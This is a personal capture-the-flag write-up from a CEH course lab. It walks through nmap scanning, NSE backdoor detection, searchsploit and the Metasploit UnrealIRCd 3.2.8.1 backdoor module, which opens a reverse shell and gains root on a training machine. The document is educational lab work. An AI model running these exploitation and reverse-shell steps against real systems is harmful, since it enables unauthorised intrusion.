UNR34L.irc

This was one of the first machines done during the CEH course. The virtual machine available in my classes was a copy of another existent in the lab so, when I finally got access to the lab, I merely replicated the actions done in the VM and this let the description of the machine in the lab pass unnoticed. Had I done a decent job during the enumeration phase, I wouldn’t have lost time looking for a machine with the resources later needed. Were this be the OSCP test I’d be in trouble.

So one of the lessons learned here was: information gathering, footprinting and scanning must be really well done as it saves time in the future.

Maq106 – MÁQUINA 192.168.10.106
Descrição: Procure descobrir o(s) ponto(s) de vulnerabilidade(s) desta máquina e capture a flag!
A máquina pode esconder segredos interessantes para comprometer outras máquinas no Laboratório de Pentest

Let’s start seeing what are we dealing with. I have an IP address and nothing else.
I’ll look for the running OS and for any open ports.

root@parrot:~# nmap -O -sV 192.168.10.106
Nmap scan report for 192.168.10.106
Host is up (0.0071s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0)
53/tcp open domain ISC BIND 9.5.1-P3
80/tcp open http Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch)
111/tcp open rpcbind 2 (RPC #100000)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc UnrealIRCd
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=5/10%OT=22%CT=1%CU=40390%PV=Y%DS=2%DC=I%G=Y%TM=5AF4F50
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=C0%GCD=1%ISR=CC%TI=Z%II=I%TS=8)OPS(O1=M54
OS:8ST11NW5%O2=M548ST11NW5%O3=M548NNT11NW5%O4=M548ST11NW5%O5=M548ST11NW5%O6
OS:=M548ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF
OS:=Y%T=40%W=16D0%O=M548NNSNW5%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%
OS:Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6
OS:(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RU
OS:D=G)IE(R=Y%DFI=N%T=40%CD=S)
 
Network Distance: 2 hops
Service Info: Host: irc.maq106.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.90 seconds

Good enough, it’s a Debian and we have a few known services running there. The one odd here is this irc. So is the one I’ll start poking.

root@parrot:~# locate *.nse | grep irc
/usr/share/nmap/scripts/irc-botnet-channels.nse
/usr/share/nmap/scripts/irc-brute.nse
/usr/share/nmap/scripts/irc-info.nse
/usr/share/nmap/scripts/irc-sasl-brute.nse
/usr/share/nmap/scripts/irc-unrealircd-backdoor.nse

A script for the same irc server we have. Let’s see what this irc-unrealircd-backdoor.nse can show us.

root@parrot:~# nmap 192.168.10.106 -p6667 --script irc-unrealircd-backdoor.nse
Nmap scan report for 192.168.10.106
Host is up (0.0075s latency).
 
PORT STATE SERVICE
6667/tcp open irc
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
 
Nmap done: 1 IP address (1 host up) scanned in 9.99 seconds

Right, the service is vulnerable, just let me check the irc service version before proceeding.

root@parrot:~# nmap 192.168.10.106 -p6667 --script irc-info.nse
Nmap scan report for 192.168.10.106
Host is up (0.039s latency).
 
PORT STATE SERVICE
6667/tcp open irc
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.maq106.com
| version: Unreal3.2.8.1. irc.maq106.com
| uptime: 1 days, 5:14:01
| source ident: nmap
| source host: 5970F2CA.18AECCC8.1C965CCA.IP
|_ error: Closing Link: ijfqofavr[192.168.200.2] (Quit: ijfqofavr)
 
Nmap done: 1 IP address (1 host up) scanned in 1.86 seconds

We already had the service name, now we have the version too. Let’s check if we already have an exploit ready for this version.

root@parrot:~# searchsploit unrealirc
------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------- ----------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/27407.pl
------------------------------------------------------------- ----------------------------------------

I’ll cut the chase straight to the Metasploit, pick the script shown above and set it’s options.

root@parrot:~# service postgresql start
root@parrot:~# msfconsole
 
msf > search unrealirc
 
Matching Modules
================
 
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution
 
 
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
 
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST 192.168.10.106
RHOST => 192.168.10.106

Ready to run the exploit.

msf > exploit
[*] Started reverse TCP double handler on 192.168.200.2:4444
[*] 192.168.10.106:6667 - Connected to 192.168.10.106:6667...
:irc.maq106.com NOTICE AUTH :*** Looking up your hostname...
:irc.maq106.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.10.106:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ealfLbzJRfkl7r18;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ealfLbzJRfkl7r18\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.200.2:4444 -> 192.168.10.106:47422) at 2018-04-24 09:21:40 -0300
 
whoami
root
 
cat /root/flag.txt
ch4mp10n5-n3v3r-g1v3-up!

The exploit finished and I typed this whoami to check the prompt. I am root. I finished reading the flag.txt content (it’s not the real one here) but the machine is owned. You can do anything now, like seeing the other users available and their encrypted passwords or maybe even other networks this machine can reach…